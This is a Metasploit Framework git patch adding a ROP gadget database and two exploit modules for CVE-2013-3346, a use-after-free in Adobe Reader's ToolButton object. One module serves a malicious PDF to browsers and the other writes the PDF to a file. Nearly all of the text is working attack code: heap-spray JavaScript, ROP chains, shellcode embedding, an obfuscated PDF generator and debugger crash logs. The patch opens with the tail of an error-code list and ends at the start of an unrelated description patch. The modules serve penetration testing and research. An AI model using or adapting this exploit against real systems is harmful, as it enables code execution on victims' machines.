SXS_XML_E_UNCLOSEDCOMMENT = 0x36EF + SXS_XML_E_UNCLOSEDDECL = 0x36F0 + SXS_XML_E_UNCLOSEDCDATA = 0x36F1 + SXS_XML_E_RESERVEDNAMESPACE = 0x36F2 + SXS_XML_E_INVALIDENCODING = 0x36F3 + SXS_XML_E_INVALIDSWITCH = 0x36F4 + SXS_XML_E_BADXMLCASE = 0x36F5 + SXS_XML_E_INVALID_STANDALONE = 0x36F6 + SXS_XML_E_UNEXPECTED_STANDALONE = 0x36F7 + SXS_XML_E_INVALID_VERSION = 0x36F8 + SXS_XML_E_MISSINGEQUALS = 0x36F9 + SXS_PROTECTION_RECOVERY_FAILED = 0x36FA + SXS_PROTECTION_PUBLIC_KEY_TOO_SHORT = 0x36FB + SXS_PROTECTION_CATALOG_NOT_VALID = 0x36FC + SXS_UNTRANSLATABLE_HRESULT = 0x36FD + SXS_PROTECTION_CATALOG_FILE_MISSING = 0x36FE + SXS_MISSING_ASSEMBLY_IDENTITY_ATTRIBUTE = 0x36FF + SXS_INVALID_ASSEMBLY_IDENTITY_ATTRIBUTE_NAME = 0x3700 + SXS_ASSEMBLY_MISSING = 0x3701 + SXS_CORRUPT_ACTIVATION_STACK = 0x3702 + SXS_CORRUPTION = 0x3703 + SXS_EARLY_DEACTIVATION = 0x3704 + SXS_INVALID_DEACTIVATION = 0x3705 + SXS_MULTIPLE_DEACTIVATION = 0x3706 + SXS_PROCESS_TERMINATION_REQUESTED = 0x3707 + SXS_RELEASE_ACTIVATION_CONTEXT = 0x3708 + SXS_SYSTEM_DEFAULT_ACTIVATION_CONTEXT_EMPTY = 0x3709 + SXS_INVALID_IDENTITY_ATTRIBUTE_VALUE = 0x370A + SXS_INVALID_IDENTITY_ATTRIBUTE_NAME = 0x370B + SXS_IDENTITY_DUPLICATE_ATTRIBUTE = 0x370C + SXS_IDENTITY_PARSE_ERROR = 0x370D + MALFORMED_SUBSTITUTION_STRING = 0x370E + SXS_INCORRECT_PUBLIC_KEY_TOKEN = 0x370F + UNMAPPED_SUBSTITUTION_STRING = 0x3710 + SXS_ASSEMBLY_NOT_LOCKED = 0x3711 + SXS_COMPONENT_STORE_CORRUPT = 0x3712 + ADVANCED_INSTALLER_FAILED = 0x3713 + XML_ENCODING_MISMATCH = 0x3714 + SXS_MANIFEST_IDENTITY_SAME_BUT_CONTENTS_DIFFERENT = 0x3715 + SXS_IDENTITIES_DIFFERENT = 0x3716 + SXS_ASSEMBLY_IS_NOT_A_DEPLOYMENT = 0x3717 + SXS_FILE_NOT_PART_OF_ASSEMBLY = 0x3718 + SXS_MANIFEST_TOO_BIG = 0x3719 + SXS_SETTING_NOT_REGISTERED = 0x371A + SXS_TRANSACTION_CLOSURE_INCOMPLETE = 0x371B + SMI_PRIMITIVE_INSTALLER_FAILED = 0x371C + GENERIC_COMMAND_FAILED = 0x371D + SXS_FILE_HASH_MISSING = 0x371E + EVT_INVALID_CHANNEL_PATH = 0x3A98 + EVT_INVALID_QUERY = 0x3A99 + EVT_PUBLISHER_METADATA_NOT_FOUND = 0x3A9A + EVT_EVENT_TEMPLATE_NOT_FOUND = 0x3A9B + EVT_INVALID_PUBLISHER_NAME = 0x3A9C + EVT_INVALID_EVENT_DATA = 0x3A9D + EVT_CHANNEL_NOT_FOUND = 0x3A9F + EVT_MALFORMED_XML_TEXT = 0x3AA0 + EVT_SUBSCRIPTION_TO_DIRECT_CHANNEL = 0x3AA1 + EVT_CONFIGURATION_ERROR = 0x3AA2 + EVT_QUERY_RESULT_STALE = 0x3AA3 + EVT_QUERY_RESULT_INVALID_POSITION = 0x3AA4 + EVT_NON_VALIDATING_MSXML = 0x3AA5 + EVT_FILTER_ALREADYSCOPED = 0x3AA6 + EVT_FILTER_NOTELTSET = 0x3AA7 + EVT_FILTER_INVARG = 0x3AA8 + EVT_FILTER_INVTEST = 0x3AA9 + EVT_FILTER_INVTYPE = 0x3AAA + EVT_FILTER_PARSEERR = 0x3AAB + EVT_FILTER_UNSUPPORTEDOP = 0x3AAC + EVT_FILTER_UNEXPECTEDTOKEN = 0x3AAD + EVT_INVALID_OPERATION_OVER_ENABLED_DIRECT_CHANNEL = 0x3AAE + EVT_INVALID_CHANNEL_PROPERTY_VALUE = 0x3AAF + EVT_INVALID_PUBLISHER_PROPERTY_VALUE = 0x3AB0 + EVT_CHANNEL_CANNOT_ACTIVATE = 0x3AB1 + EVT_FILTER_TOO_COMPLEX = 0x3AB2 + EVT_MESSAGE_NOT_FOUND = 0x3AB3 + EVT_MESSAGE_ID_NOT_FOUND = 0x3AB4 + EVT_UNRESOLVED_VALUE_INSERT = 0x3AB5 + EVT_UNRESOLVED_PARAMETER_INSERT = 0x3AB6 + EVT_MAX_INSERTS_REACHED = 0x3AB7 + EVT_EVENT_DEFINITION_NOT_FOUND = 0x3AB8 + EVT_MESSAGE_LOCALE_NOT_FOUND = 0x3AB9 + EVT_VERSION_TOO_OLD = 0x3ABA + EVT_VERSION_TOO_NEW = 0x3ABB + EVT_CANNOT_OPEN_CHANNEL_OF_QUERY = 0x3ABC + EVT_PUBLISHER_DISABLED = 0x3ABD + EVT_FILTER_OUT_OF_RANGE = 0x3ABE + EC_SUBSCRIPTION_CANNOT_ACTIVATE = 0x3AE8 + EC_LOG_DISABLED = 0x3AE9 + EC_CIRCULAR_FORWARDING = 0x3AEA + EC_CREDSTORE_FULL = 0x3AEB + EC_CRED_NOT_FOUND = 0x3AEC + EC_NO_ACTIVE_CHANNEL = 0x3AED + MUI_FILE_NOT_FOUND = 0x3AFC + MUI_INVALID_FILE = 0x3AFD + MUI_INVALID_RC_CONFIG = 0x3AFE + MUI_INVALID_LOCALE_NAME = 0x3AFF + MUI_INVALID_ULTIMATEFALLBACK_NAME = 0x3B00 + MUI_FILE_NOT_LOADED = 0x3B01 + RESOURCE_ENUM_USER_STOP = 0x3B02 + MUI_INTLSETTINGS_UILANG_NOT_INSTALLED = 0x3B03 + MUI_INTLSETTINGS_INVALID_LOCALE_NAME = 0x3B04 + MCA_INVALID_CAPABILITIES_STRING = 0x3B60 + MCA_INVALID_VCP_VERSION = 0x3B61 + MCA_MONITOR_VIOLATES_MCCS_SPECIFICATION = 0x3B62 + MCA_MCCS_VERSION_MISMATCH = 0x3B63 + MCA_UNSUPPORTED_MCCS_VERSION = 0x3B64 + MCA_INTERNAL_ERROR = 0x3B65 + MCA_INVALID_TECHNOLOGY_TYPE_RETURNED = 0x3B66 + MCA_UNSUPPORTED_COLOR_TEMPERATURE = 0x3B67 + AMBIGUOUS_SYSTEM_DEVICE = 0x3B92 + SYSTEM_DEVICE_NOT_FOUND = 0x3BC3 + HASH_NOT_SUPPORTED = 0x3BC4 + HASH_NOT_PRESENT = 0x3BC5 end From 533accaa8782a0b9a543b80a61289084276ee059 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 16 Dec 2013 14:13:47 -0600 Subject: [PATCH 063/205] Add module for CVE-2013-3346 --- data/ropdb/reader.xml | 132 +++++++ .../windows/browser/adobe_toolbutton.rb | 353 +++++++++++++++++ .../windows/fileformat/adobe_toolbutton.rb | 360 ++++++++++++++++++ 3 files changed, 845 insertions(+) create mode 100644 data/ropdb/reader.xml create mode 100644 modules/exploits/windows/browser/adobe_toolbutton.rb create mode 100644 modules/exploits/windows/fileformat/adobe_toolbutton.rb diff --git a/data/ropdb/reader.xml b/data/ropdb/reader.xml new file mode 100644 index 0000000000..2e4c6bd4ea --- /dev/null +++ b/data/ropdb/reader.xml @@ -0,0 +1,132 @@ + + + + + + 9 + + + + pop ecx # ret + push eax # pop esp # ret + pop eax # ret + ptr to CreateFileMappingA() + call [eax] # ret + HANDLE hFile + LPSECURITY_ATTRIBUTES lpAttributes + DWORD flProtect + DWORD dwMaximumSizeHigh + DWORD dwMaximumSizeHigh + LPCTSTR lpName + pop edi # ret + pop ebp # pop ebx # pop ecx # ret + pop ebx # ret + pop eax # ret + pop ecx # ret + ptr to MapViewOfFile() + mov edx, ecx + pop ecx # ret + call [eax] # ret + pushad # add al, 0 # ret + DWORD dwDesiredAccess + DWORD dwFileOffsetHigh + DWORD dwFileOffsetLow + SIZE_T dwNumberOfBytesToMap + pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret + jmp IAT msvcr80!memcpy + ret + JUNK + memcpy length + JUNK + xchg eax, ebp # ret + pushad # add al, 0 # ret + + + + + + 10 + + + + pop ecx # ret + push eax # pop esp # ret + pop eax # ret + ptr to CreateFileMappingA() + call [eax] # ret + HANDLE hFile + LPSECURITY_ATTRIBUTES lpAttributes + DWORD flProtect + DWORD dwMaximumSizeHigh + DWORD dwMaximumSizeHigh + LPCTSTR lpName + pop edi # ret + pop ebp # pop ebx # pop ecx # ret + pop ebx # ret + pop eax # ret + pop ecx # ret + ptr to MapViewOfFile() + mov edx, ecx + pop ecx # ret + call [eax] # ret + pushad # add al, 0 # ret + DWORD dwDesiredAccess + DWORD dwFileOffsetHigh + DWORD dwFileOffsetLow + SIZE_T dwNumberOfBytesToMap + pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret + jmp to IAT msvcr90!memcpy + ret + JUNK + memcpy length + JUNK + xchg eax, ebp # ret + pushad # add al, 0 # ret + + + + + + 11 + + + + pop ecx # ret + push eax # pop esp # ret + pop eax # ret + ptr to CreateFileMappingA() + call [eax] # ret + HANDLE hFile + LPSECURITY_ATTRIBUTES lpAttributes + DWORD flProtect + DWORD dwMaximumSizeHigh + DWORD dwMaximumSizeHigh + LPCTSTR lpName + pop edi # ret + JUNK + pop ebx # pop esi # pop ebp # ret + pop eax # ret + pop esi # pop ebp # ret + JUNK + pop ecx # ret + call [eax] # ret + pop edx # ret + ptr to MapViewOfFile() + pushad # add al, 0 # pop ebp # ret + DWORD dwDesiredAccess + DWORD dwFileOffsetHigh + DWORD dwFileOffsetLow + SIZE_T dwNumberOfBytesToMap + pop edi # pop esi # pop ebp # ret + memcpy address + call eax # ret + memcpy address + xchg eax, ebp # ret + pop ebx # ret + memcpy length + pop edx # ret + pop edx # ret + pushad # add al, 0 # pop ebp # ret + + + \ No newline at end of file diff --git a/modules/exploits/windows/browser/adobe_toolbutton.rb b/modules/exploits/windows/browser/adobe_toolbutton.rb new file mode 100644 index 0000000000..c861610199 --- /dev/null +++ b/modules/exploits/windows/browser/adobe_toolbutton.rb @@ -0,0 +1,353 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::BrowserExploitServer + + def initialize(info={}) + super(update_info(info, + 'Name' => "Adobe ToolButton Use After Free", + 'Description' => %q{ + This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6 + and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where + the cEnable callback can be used to early free the object memory. Later use of the object + allows to trigger the use after free condition. This module has been tested successfully + on Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild on + November 2013. At the moment this module doesn't support Adobe Reader 9 targets, in order + to exploit Adobe Reader 9 the fileformat version of the exploit can be used. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Soroush Dalili', # Vulnerability discovery + 'Unknown', # Exploit in the wild + 'sinn3r', # Metasploit module + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2013-3346' ], + [ 'OSVDB', '96745' ], + [ 'ZDI', '13-212' ], + [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ] + ], + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00", + 'DisableNops' => true + }, + 'BrowserRequirements' => + { + :source => /script|headers/i, + :os_name => Msf::OperatingSystems::WINDOWS, + :os_flavor => Msf::OperatingSystems::WindowsVersions::XP, + :ua_name => Msf::HttpClients::IE + }, + 'Targets' => + [ + [ 'Windows XP / IE / Adobe Reader 10/11', { } ], + ], + 'Privileged' => false, + 'DisclosureDate' => "Aug 08 2013", + 'DefaultTarget' => 0)) + + end + + def on_request_exploit(cli, request, target_info) + print_status("request: #{request.uri}") + js_data = make_js(cli, target_info) + # Create the pdf + pdf = make_pdf(js_data) + print_status("Sending PDF...") + send_response(cli, pdf, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' }) + end + + def make_js(cli, target_info) + # CreateFileMappingA + MapViewOfFile + memcpy rop chain + rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' })) + rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' })) + escaped_payload = Rex::Text.to_unescape(get_payload(cli, target_info)) + + js = %Q| +function heapSpray(str, str_addr, r_addr) { + var aaa = unescape("%u0c0c"); + aaa += aaa; + while ((aaa.length + 24 + 4) < (0x8000 + 0x8000)) aaa += aaa; + var i1 = r_addr - 0x24; + var bbb = aaa.substring(0, i1 / 2); + var sa = str_addr; + while (sa.length < (0x0c0c - r_addr)) sa += sa; + bbb += sa; + bbb += aaa; + var i11 = 0x0c0c - 0x24; + bbb = bbb.substring(0, i11 / 2); + bbb += str; + bbb += aaa; + var i2 = 0x4000 + 0xc000; + var ccc = bbb.substring(0, i2 / 2); + while (ccc.length < (0x40000 + 0x40000)) ccc += ccc; + var i3 = (0x1020 - 0x08) / 2; + var ddd = ccc.substring(0, 0x80000 - i3); + var eee = new Array(); + for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + "s"; + return; +} +var shellcode = unescape("#{escaped_payload}"); +var executable = ""; +var rop10 = unescape("#{rop_10}"); +var rop11 = unescape("#{rop_11}"); +var r11 = false; +var vulnerable = true; + +var obj_size; +var rop; +var ret_addr; +var rop_addr; +var r_addr; + +if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) { + obj_size = 0x360 + 0x1c; + rop = rop10; + rop_addr = unescape("%u08e4%u0c0c"); + r_addr = 0x08e4; + ret_addr = unescape("%ua8df%u4a82"); +} else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) { + r11 = true; + obj_size = 0x370; + rop = rop11; + rop_addr = unescape("%u08a8%u0c0c"); + r_addr = 0x08a8; + ret_addr = unescape("%u8003%u4a84"); +} else { + vulnerable = false; +} + +if (vulnerable) { + var payload = rop + shellcode; + heapSpray(payload, ret_addr, r_addr); + + var part1 = ""; + if (!r11) { + for (i = 0; i < 0x1c / 2; i++) part1 += unescape("%u4141"); + } + part1 += rop_addr; + var part2 = ""; + var part2_len = obj_size - part1.length * 2; + for (i = 0; i < part2_len / 2 - 1; i++) part2 += unescape("%u4141"); + var arr = new Array(); + + removeButtonFunc = function () { + app.removeToolButton({ + cName: "evil" + }); + + for (i = 0; i < 10; i++) arr[i] = part1.concat(part2); + } + + addButtonFunc = function () { + app.addToolButton({ + cName: "xxx", + cExec: "1", + cEnable: "removeButtonFunc();" + }); + } + + app.addToolButton({ + cName: "evil", + cExec: "1", + cEnable: "addButtonFunc();" + }); +} +| + + js + end + + def RandomNonASCIIString(count) + result = "" + count.times do + result << (rand(128) + 128).chr + end + result + end + + def ioDef(id) + "%d 0 obj \n" % id + end + + def ioRef(id) + "%d 0 R" % id + end + + + #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ + def nObfu(str) + #return str + result = "" + str.scan(/./u) do |c| + if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' + result << "#%x" % c.unpack("C*")[0] + else + result << c + end + end + result + end + + + def ASCIIHexWhitespaceEncode(str) + result = "" + whitespace = "" + str.each_byte do |b| + result << whitespace << "%02x" % b + whitespace = " " * (rand(3) + 1) + end + result << ">" + end + + + def make_pdf(js) + xref = [] + eol = "\n" + endobj = "endobj" << eol + + # Randomize PDF version? + pdf = "%PDF-1.5" << eol + pdf << "%" << RandomNonASCIIString(4) << eol + + # catalog + xref << pdf.length + pdf << ioDef(1) << nObfu("<<") << eol + pdf << nObfu("/Pages ") << ioRef(2) << eol + pdf << nObfu("/Type /Catalog") << eol + pdf << nObfu("/OpenAction ") << ioRef(4) << eol + # The AcroForm is required to get icucnv36.dll / icucnv40.dll to load + pdf << nObfu("/AcroForm ") << ioRef(6) << eol + pdf << nObfu(">>") << eol + pdf << endobj + + # pages array + xref << pdf.length + pdf << ioDef(2) << nObfu("<<") << eol + pdf << nObfu("/Kids [") << ioRef(3) << "]" << eol + pdf << nObfu("/Count 1") << eol + pdf << nObfu("/Type /Pages") << eol + pdf << nObfu(">>") << eol + pdf << endobj + + # page 1 + xref << pdf.length + pdf << ioDef(3) << nObfu("<<") << eol + pdf << nObfu("/Parent ") << ioRef(2) << eol + pdf << nObfu("/Type /Page") << eol + pdf << nObfu(">>") << eol # end obj dict + pdf << endobj + + # js action + xref << pdf.length + pdf << ioDef(4) << nObfu("<<") + pdf << nObfu("/Type/Action/S/JavaScript/JS ") + ioRef(5) + pdf << nObfu(">>") << eol + pdf << endobj + + # js stream + xref << pdf.length + compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js)) + pdf << ioDef(5) << nObfu("<>" % compressed.length) << eol + pdf << "stream" << eol + pdf << compressed << eol + pdf << "endstream" << eol + pdf << endobj + + ### + # The following form related data is required to get icucnv36.dll / icucnv40.dll to load + ### + + # form object + xref << pdf.length + pdf << ioDef(6) + pdf << nObfu("<>") << eol + pdf << endobj + + # form stream + xfa = <<-EOF + + + +1 + + + EOF + + xref << pdf.length + pdf << ioDef(7) << nObfu("<>" % xfa.length) << eol + pdf << "stream" << eol + pdf << xfa << eol + pdf << "endstream" << eol + pdf << endobj + + ### + # end form stuff for icucnv36.dll / icucnv40.dll + ### + + + # trailing stuff + xrefPosition = pdf.length + pdf << "xref" << eol + pdf << "0 %d" % (xref.length + 1) << eol + pdf << "0000000000 65535 f" << eol + xref.each do |index| + pdf << "%010d 00000 n" % index << eol + end + + pdf << "trailer" << eol + pdf << nObfu("<>" << eol + + pdf << "startxref" << eol + pdf << xrefPosition.to_s() << eol + + pdf << "%%EOF" << eol + pdf + end + +end + + +=begin + +* crash Adobe Reader 10.1.4 + +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +eax=0c0c08e4 ebx=00000000 ecx=02eb6774 edx=66dd0024 esi=02eb6774 edi=00000001 +eip=604d3a4d esp=0012e4fc ebp=0012e51c iopl=0 nv up ei pl nz ac po cy +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213 +AcroRd32_60000000!PDFLTerm+0xbb7cd: +604d3a4d ff9028030000 call dword ptr [eax+328h] ds:0023:0c0c0c0c=???????? + +* crash Adobe Reader 11.0.2 + +(940.d70): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.dll - +eax=0c0c08a8 ebx=00000001 ecx=02d68090 edx=5b21005b esi=02d68090 edi=00000000 +eip=60197b9b esp=0012e3fc ebp=0012e41c iopl=0 nv up ei pl nz ac po cy +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213 +AcroRd32_60000000!DllCanUnloadNow+0x1493ae: +60197b9b ff9064030000 call dword ptr [eax+364h] ds:0023:0c0c0c0c=???????? + +=end + diff --git a/modules/exploits/windows/fileformat/adobe_toolbutton.rb b/modules/exploits/windows/fileformat/adobe_toolbutton.rb new file mode 100644 index 0000000000..5decadeacd --- /dev/null +++ b/modules/exploits/windows/fileformat/adobe_toolbutton.rb @@ -0,0 +1,360 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::RopDb + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Adobe ToolButton Use After Free', + 'Description' => %q{ + This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6 + and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where + the cEnable callback can be used to early free the object memory. Later use of the object + allows to trigger the use after free condition. This module has been tested successfully + on Adobe Reader 11.0.2, 10.0.4 and 9.5.0 on Windows XP SP3, as exploited in the wild on + November 2013. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Soroush Dalili', # Vulnerability discovery + 'Unknown', # Exploit in the wild + 'sinn3r', # Metasploit module + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2013-3346' ], + [ 'OSVDB', '96745' ], + [ 'ZDI', '13-212' ], + [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ] + ], + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00", + 'DisableNops' => true + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP / Adobe Reader 9/10/11', { }], + ], + 'Privileged' => false, + 'DisclosureDate' => 'Aug 08 2013', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), + ], self.class) + end + + def exploit + js_data = make_js + + # Create the pdf + pdf = make_pdf(js_data) + + print_status("Creating '#{datastore['FILENAME']}' file...") + + file_create(pdf) + end + + + def make_js + + # CreateFileMappingA + MapViewOfFile + memcpy rop chain + rop_9 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '9' })) + rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' })) + rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' })) + escaped_payload = Rex::Text.to_unescape(payload.encoded) + + js = %Q| +function heapSpray(str, str_addr, r_addr) { + var aaa = unescape("%u0c0c"); + aaa += aaa; + while ((aaa.length + 24 + 4) < (0x8000 + 0x8000)) aaa += aaa; + var i1 = r_addr - 0x24; + var bbb = aaa.substring(0, i1 / 2); + var sa = str_addr; + while (sa.length < (0x0c0c - r_addr)) sa += sa; + bbb += sa; + bbb += aaa; + var i11 = 0x0c0c - 0x24; + bbb = bbb.substring(0, i11 / 2); + bbb += str; + bbb += aaa; + var i2 = 0x4000 + 0xc000; + var ccc = bbb.substring(0, i2 / 2); + while (ccc.length < (0x40000 + 0x40000)) ccc += ccc; + var i3 = (0x1020 - 0x08) / 2; + var ddd = ccc.substring(0, 0x80000 - i3); + var eee = new Array(); + for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + "s"; + return; +} +var shellcode = unescape("#{escaped_payload}"); +var executable = ""; +var rop9 = unescape("#{rop_9}"); +var rop10 = unescape("#{rop_10}"); +var rop11 = unescape("#{rop_11}"); +var r11 = false; +var vulnerable = true; + +var obj_size; +var rop; +var ret_addr; +var rop_addr; +var r_addr; + +if (app.viewerVersion >= 9 && app.viewerVersion < 10 && app.viewerVersion <= 9.504) { + obj_size = 0x330 + 0x1c; + rop = rop9; + ret_addr = unescape("%ua83e%u4a82"); + rop_addr = unescape("%u08e8%u0c0c"); + r_addr = 0x08e8; +} else if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) { + obj_size = 0x360 + 0x1c; + rop = rop10; + rop_addr = unescape("%u08e4%u0c0c"); + r_addr = 0x08e4; + ret_addr = unescape("%ua8df%u4a82"); +} else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) { + r11 = true; + obj_size = 0x370; + rop = rop11; + rop_addr = unescape("%u08a8%u0c0c"); + r_addr = 0x08a8; + ret_addr = unescape("%u8003%u4a84"); +} else { + vulnerable = false; +} + +if (vulnerable) { + var payload = rop + shellcode; + heapSpray(payload, ret_addr, r_addr); + + var part1 = ""; + if (!r11) { + for (i = 0; i < 0x1c / 2; i++) part1 += unescape("%u4141"); + } + part1 += rop_addr; + var part2 = ""; + var part2_len = obj_size - part1.length * 2; + for (i = 0; i < part2_len / 2 - 1; i++) part2 += unescape("%u4141"); + var arr = new Array(); + + removeButtonFunc = function () { + app.removeToolButton({ + cName: "evil" + }); + + for (i = 0; i < 10; i++) arr[i] = part1.concat(part2); + } + + addButtonFunc = function () { + app.addToolButton({ + cName: "xxx", + cExec: "1", + cEnable: "removeButtonFunc();" + }); + } + + app.addToolButton({ + cName: "evil", + cExec: "1", + cEnable: "addButtonFunc();" + }); +} +| + + js + end + + def RandomNonASCIIString(count) + result = "" + count.times do + result << (rand(128) + 128).chr + end + result + end + + def ioDef(id) + "%d 0 obj \n" % id + end + + def ioRef(id) + "%d 0 R" % id + end + + + #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ + def nObfu(str) + #return str + result = "" + str.scan(/./u) do |c| + if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' + result << "#%x" % c.unpack("C*")[0] + else + result << c + end + end + result + end + + + def ASCIIHexWhitespaceEncode(str) + result = "" + whitespace = "" + str.each_byte do |b| + result << whitespace << "%02x" % b + whitespace = " " * (rand(3) + 1) + end + result << ">" + end + + + def make_pdf(js) + xref = [] + eol = "\n" + endobj = "endobj" << eol + + # Randomize PDF version? + pdf = "%PDF-1.5" << eol + pdf << "%" << RandomNonASCIIString(4) << eol + + # catalog + xref << pdf.length + pdf << ioDef(1) << nObfu("<<") << eol + pdf << nObfu("/Pages ") << ioRef(2) << eol + pdf << nObfu("/Type /Catalog") << eol + pdf << nObfu("/OpenAction ") << ioRef(4) << eol + # The AcroForm is required to get icucnv36.dll / icucnv40.dll to load + pdf << nObfu("/AcroForm ") << ioRef(6) << eol + pdf << nObfu(">>") << eol + pdf << endobj + + # pages array + xref << pdf.length + pdf << ioDef(2) << nObfu("<<") << eol + pdf << nObfu("/Kids [") << ioRef(3) << "]" << eol + pdf << nObfu("/Count 1") << eol + pdf << nObfu("/Type /Pages") << eol + pdf << nObfu(">>") << eol + pdf << endobj + + # page 1 + xref << pdf.length + pdf << ioDef(3) << nObfu("<<") << eol + pdf << nObfu("/Parent ") << ioRef(2) << eol + pdf << nObfu("/Type /Page") << eol + pdf << nObfu(">>") << eol # end obj dict + pdf << endobj + + # js action + xref << pdf.length + pdf << ioDef(4) << nObfu("<<") + pdf << nObfu("/Type/Action/S/JavaScript/JS ") + ioRef(5) + pdf << nObfu(">>") << eol + pdf << endobj + + # js stream + xref << pdf.length + compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js)) + pdf << ioDef(5) << nObfu("<>" % compressed.length) << eol + pdf << "stream" << eol + pdf << compressed << eol + pdf << "endstream" << eol + pdf << endobj + + ### + # The following form related data is required to get icucnv36.dll / icucnv40.dll to load + ### + + # form object + xref << pdf.length + pdf << ioDef(6) + pdf << nObfu("<>") << eol + pdf << endobj + + # form stream + xfa = <<-EOF + + + +1 + + +EOF + + xref << pdf.length + pdf << ioDef(7) << nObfu("<>" % xfa.length) << eol + pdf << "stream" << eol + pdf << xfa << eol + pdf << "endstream" << eol + pdf << endobj + + ### + # end form stuff for icucnv36.dll / icucnv40.dll + ### + + + # trailing stuff + xrefPosition = pdf.length + pdf << "xref" << eol + pdf << "0 %d" % (xref.length + 1) << eol + pdf << "0000000000 65535 f" << eol + xref.each do |index| + pdf << "%010d 00000 n" % index << eol + end + + pdf << "trailer" << eol + pdf << nObfu("<>" << eol + + pdf << "startxref" << eol + pdf << xrefPosition.to_s() << eol + + pdf << "%%EOF" << eol + pdf + end + +end + + +=begin + +* crash Adobe Reader 10.1.4 + +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +eax=0c0c08e4 ebx=00000000 ecx=02eb6774 edx=66dd0024 esi=02eb6774 edi=00000001 +eip=604d3a4d esp=0012e4fc ebp=0012e51c iopl=0 nv up ei pl nz ac po cy +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213 +AcroRd32_60000000!PDFLTerm+0xbb7cd: +604d3a4d ff9028030000 call dword ptr [eax+328h] ds:0023:0c0c0c0c=???????? + +* crash Adobe Reader 11.0.2 + +(940.d70): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.dll - +eax=0c0c08a8 ebx=00000001 ecx=02d68090 edx=5b21005b esi=02d68090 edi=00000000 +eip=60197b9b esp=0012e3fc ebp=0012e41c iopl=0 nv up ei pl nz ac po cy +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213 +AcroRd32_60000000!DllCanUnloadNow+0x1493ae: +60197b9b ff9064030000 call dword ptr [eax+364h] ds:0023:0c0c0c0c=???????? + +=end \ No newline at end of file From 040619c373a0a598220b838a8dd3670d98eae508 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 16 Dec 2013 14:57:33 -0600 Subject: [PATCH 064/205] Minor description changes No code changes (one comment made on play_youtube to suggest xdg-open rather than firefox for linux targets). --- modules/exploits/multi/http/coldfusion_rds.rb | 13 ++++++++----- .../windows/http/hp_loadrunner_copyfiletoserver.rb | 8 ++++---- modules/exploits/windows/local/ms_ndproxy.rb | 6 +++--- modules/exploits/windows/local/nvidia_nvsvc.rb | 7 +++---- modules/post/multi/manage/play_youtube.rb | 7 ++++--- modules/post/windows/manage/ie_proxypac.rb | 2 +- test/modules/auxiliary/test/httpserver.rb | 5 ++--- 7 files changed, 25 insertions(+), 23 deletions(-) diff --git a/modules/exploits/multi/http/coldfusion_rds.rb b/modules/exploits/multi/http/coldfusion_rds.rb index df50dc1019..f4fe327e7b 100644 --- 